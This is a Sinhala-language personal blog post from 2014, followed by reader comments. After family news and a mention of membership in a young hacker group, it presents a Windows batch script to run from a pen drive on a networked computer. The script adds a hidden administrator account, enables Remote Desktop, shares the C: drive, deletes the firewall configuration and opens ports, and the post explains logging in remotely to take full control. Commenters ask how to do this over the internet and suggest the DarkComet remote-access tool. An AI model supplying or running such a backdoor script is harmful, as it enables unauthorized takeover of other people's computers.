අද 2014ක් වූ පෙබරවාරි මස 14 වන පෙම්වතුන්ගේ දිනයලු.. ඊටත් කලින්නෙ අවුරුද්ද ලැබුවෙ. අලුත් අවුරුද්දට අලුත් පෝස්ටුවක් කෙසේවෙතත් ජිලාගෙ සහෘදයන්ට ජිලා ලැබුවා වූ සුභම සුභ වසරට සුභපතල ඉන්න එපැයි.. ඕං එහෙනං...

අෆ්ෆා 2014 අවුරුද්දත් ලැබුවා ජිලාගෙ ජිල්මාට්ස් බ්ලොගිය අප්ටුඩේට් වීමක් වෙන්නෙම නැද්දෝයි කියල ජිලාගෙ බුකියෙ ගිණුමට ආපු මැසේජ්ජු අනන්තයි අප්‍රමාණයි.. 2013 දෙසැම්බරයේ අවසන් දවස් කීපයේ ජිලාට සෙනසුරු බලපෑමක් ලබලද කොහෙද ජිලාගෙ ආදරණීය අම්මිගෙන් ජිලාගෙ ප්‍රේමවෘතාන්තයට දැඩි බාධකයක් වුනා.. අප්පොච්චියේ ඒදවස් වල ජිලා සමහර දවසක ගෙදර වර්ජනය කිරීමට තරම් හිතුවක්කාර චරිතයක් වෙලා.. බලන්න එපැයි ඒ දවස් වල ජිලා කරපු පිස්සු වැඩ.. මතක්වෙනකොටත් බඩපපුව හෝස්ගාල දැවී යනවා.. ඕං ඉතින් කවදත් ජිලාට ඕනිම වෙලාවක උගේ ළගින්ම ඉන්න උගේ මහමොළකරු මාමා සහ පුංචි මොළකරු මල්ලියා දෙසැම්බරයේ ක්‍රිස්මස් සීසන් එකට ලංකාවට හදිසියේම ගොඩබැස්සෙ ජිලාගෙ මේ හිතුවක්කාර වැඩ නවත්වන්න හිතාගෙන.. ඔන්න ජිලාට උන්ගෙ ආදරේ හොදට ලැබෙනවලු ඈ.. ඒ විතරක්ද නෙවෙයි මහමොළකරුයි පුංචි මොළකරුයි දෙන්නම එකතුවෙලා ජිලාගෙ මේ මොළගෙඩියට තවත් සුකුරුත්තම් කියලදෙන්න..උගන්වන්න කාලය හදාගත්තු එක නොරහසක්.
…ඔන්න ඉතිං මේදවස්වල ජිලාට හරිහැටි ෆේස්බුකියටත් ගොඩවෙලා දන්නදේ කියාදෙමින් දැනුම බෙදිල්ලේ කැසිල්ල තරමක් සුවවෙලා තිබුණ බවනම් සහතික ඇත්ත. මොකෝ ඒදවස් වල ජිලාට මාමාගෙන් සහ මල්ලිගෙන් ඉගෙනගැනිල්ලේ කැසිල්ල උග්‍රව හැදුණ නිසා... මොකක්...මල්ලිගෙන් ඉගෙනගත්තා..? ඔව්...බොල ඔව්.. ජිලාගෙ මහමොළකරුගෙ පුතණ්ඩියා C)PTE මට්ටමටත් එහාගිහින්.. ජිලාටත් ඉතිං එව්ව මෙව්වා උගන්වන ගමන් ජිලා විසින් පවත්වනු ලබන පංතිවලටත් ඉගැන්වූවයි කියන්නෙ..
…ඔන්න ඉතිං ඉගෙනගැනිල්ලේ උග්‍ර කැසිල්ල නිසා ජනවාරියේ 10 වෙනිදා දක්වාම බ්ලොගියට ගොඩවෙන්න තියා බුකියට ගොඩවෙන්නවත් ජිලාට වෙලාවක් තිබුණෙ නෑලු..
…ජිලාගෙ මහමොළකරුයි එයාගෙ හාමිනේයි ජිලාගෙ පුංචි මොළකරුයි ආයෙමත් සිය වාසස්ථානයට ගුවන්ගතවෙද්දි ජිලා ළගම හිටපු එක්කුස උපන් ජිලාට හතුරු මිතුරු ආදරණීය මලයණ්ඩිත් එක්කරගෙන ගියපු නිසා ජිලාහිටියෙ දැඩි කනස්සල්ලෙන්..පාලුවෙන්..සාංකාවෙන්.. ඒ අස්සෙ රාජකාරී ආයතනයන්හි සහ පංති වල වැඩකටයුතු නිසාම තරමක් කාර්‍යබහුල චරිතයක් වීම නිසාත් ඔන්න ජිලාට බ්ලොගියට පෝස්ටු ලියාගන්ට බැරි උනා...
…අද හරියටම 2014 ක්වූ පෙබරවාරි මස 14 වෙනිද. උඹලට වැලන්ටයින් දවස... ජිලාට ඊටත් වඩා විශේෂ අතිවිශේෂ...සුවිශේෂ දවසක්ලු ඈ...
…♡පෙබරවාරි 14 ජිලාගෙ ආදරණීය මල්ලිට වයස අවුරුදු 17ක් සපිරෙණ දවස වීම.
♛පෙබරවාරි 14 ජිලා milw0rms නම්වූ සංවිධානයේ සාමාජිකත්වය ලබා වසරක් සපිරෙන දවස වීම.
(milw0rms සංවිධානය එක්තරා තරුණ හැකර්වරුන්ගේ එකමුතුවක් වූ නමුත්.. ඇත්තෙන්ම අප අතර විෂයපථධාරී දැනුම හුවමාරුවීමක්... පමණක් සිදුවන බවත් දැන්වීමට කැමැත්තෙමි.)
[̲̅ə̲̅٨̲̅٥̲̅٦̲̅] හැමෝටම වැලන්ටයින් දවසේ ජිලා සිය පෙම්වතිය නැවත වරක් මුණගැසීම සහ විශේෂ යමක් දුන් දවස වීම... දුන්නෙ මොනවද කියල අහන්න එපා හරිය... ලජ්ජයි ඕයි කලිසමක් ඇදන් මේකෙ කොටන්න බැරුවා...
අනික තමා.. ජිලාගෙ ආදරණීය සහෘදයන්ට අලුත් අවුරුද්දෙදි සුභ අශුභ නොබලා මුලින්ම මෙවැන් අසික්කිත ජිල්මාට්ස් පෝස්ටුවක් ලියමින් උන්ගේ මෙව්වා එක වර්ධනය කිරීමට තැත්කිරීම..
හරි එහෙනම් මෙන්න ජිලාගේ මෙවර අසික්කිත ජිල්මාට්ස් කෙරුවාව... මෙය හුදෙක් හැක්කිරීමට නොව Educational Purchase Only... හරිය...
…
හලි හලි දැන් අපි කොරන්න යන්නෙ කොරවෙන වැඩක් හරිය... Network එකක් අපි අතට ගැනිල්ලක්..
…සූදානම් වෙනු!...
…හරි... එහෙනම් දැන් ඔයාගෙ pen drive එක කම්පියුටර් එකට සම්බන්ධ කොරන් notepad එක දිගහැරගත්තනම්...
…හරි දැන් මේං මේක ඕකෙ කෙටුවනම් බලන්න...
@echo off
REM EDIT THESE SETTINGS
set username=USERNAME
set password=PASSWORD
set rdport=3389
set tnport=23
set rport=CHANGE_THIS
REM END EDITING SETTINGS
REM Adding The Backdoor
net user %username% %password% /add
REM Pause For Process
ping localhost -n 2 >nul
REM Adding Admin Access The Backdoor
net localgroup Administrators %username% /add
REM Hiding The Backdoor From Start Menu
REG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nul
REM Enabling Terminal Service
REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0
REM Share C:\
net share system=C:\ /unlimited
REM Stealing The IP Stuff
ipconfig /all >> G:\attach.txt (මෙහි G: උඹේ pen drive path letter වියයුතුයි.)
REM Deleting The Firewall Configuration
netsh firewall delete
REM Opening Ports
netsh firewall add portopening TCP %rdport% "WinSvcService"
netsh firewall add portopening TCP %tnport2% "WinSvcService"
netsh firewall add portopening TCP %rport% "WinSvcService"
cls
exit
…දැන් ඉතින් ඕක ඔයාගෙ pen drive එකට jilmarts.bat ලෙස save කරගන්නකෝ..
…ඔන්න ඉතින් වැහිනැති හෙනගෙඩියක් හැදුවා... දැන් තියෙන්නෙ ඉතිං දමල ගැහිල්ලක් හරිය..
…දමල ගහන්න කලින් ඕක Network එකේ තියන කම්පියුටර් එකක run කරන්නකෝ...
…ඔන්න ඉතිං දැන් හරිලු ඈ...දැන් ජිලාට පිං සිද්ධ වෙයං දෙයියනේ කියාගෙන උඹේ කම්පියුටර් එකට ඇවිදින් Remote Desktop Connection එකෙන් හරි Telnet සූත්තරෙන් හරි දන්න සරල පහසු සූත්තරේකින් අදාළ කම්පියුටර් එකට ලොග්වෙලා Username එකයි password එකයි දන්නවනේ...( Username = Username / Password = password දීල) ඕනි ඕනි දේවල් කරගන්න ඕනිවිදියට ඒ කම්පියුටරේ සම්පූර්ණ පාලනය උඹේ අයිතියට ගන්නත් දැන් උඹට පුළුවන්ලු ඈ...
(Y)
ReplyDeleteRemote Desktop Connection එකෙන් හරි Telnet සූත්තරෙන් හරි දන්න සරල පහසු සූත්තරේකින් අදාළ කම්පියුටර් එකට ලොග්වෙලා ?
ReplyDeletemkakda mken kianne? :(
ඔය වැඩේ internet මාර්ගයෙන් කරන්න බැරි වෙයිද?
ReplyDeleteපුලුවන් DarkComet වගේ Rat එකක් යූස් කරලා..
Deleteeka virus guard walata ahuwenawa bn, Backdoor/Trojan
Deleteමරේ මරු ජිල්මාර්ට්ස්... ඔය වැඩේ අන්තර් ජාලය හරහා කරන්න බැරි වෙයිද?
ReplyDeleteනියමයි ජිලා අයියේ...!!!!!
ReplyDeleteපට්ට අහ්..... නියම වැඩක් ජිලා අයියේ !!!!!!!!!
ReplyDelete…
නියමයි ජිලා අයියෙ....ඉඳල ඉඳල දැම්මට මොකෝ දාල තියෙන්නෙ වැහි නැති හෙන ගෙඩියක්ම තමා...කියල වැඩක් නෑ
ReplyDeleteඅයියෙ..මේක රන් කරද්දි අපිට user accounts හදන්න registry edit කරන්න වගේ ඒවට administrator privileges ඕනෙ වෙනවනෙ....ඒක නිසා අර lusrmgr.msc ගැන පෝස්ට් එකේ ලින්ක් එකත් දැම්මනං නොදන්න අයට වැඩේ ලේසි වෙනව..
ReplyDeleteela ela jila (Y)
ReplyDeleteමේ පාර නම් ජොබ් එකෙනුත් අයින් කරනවා අනිවාර්යෙන්ම.....
ReplyDeletehttp://jlyse.net/?g3TyB3r මෙකෙ තියෙන file එක බාන්න විදියක් කියන්නකො
ReplyDeletePen eka gahala run kalin passe pen eka remove karn awith gdra thyna pc eken e file eka run karpu pc eke ona dyk karnna puluwnda? anika khmda remote desktop connection eken anith pc ekata log wenne? poddk kiala denna puluwnda?
ReplyDeleteMaru
ReplyDeleteWaiting for new post
ReplyDeleteelaz
ReplyDeleteithin bn wena computry ehekata log wenna username,password ona ne??ewa api danne na ne. :)
ReplyDelete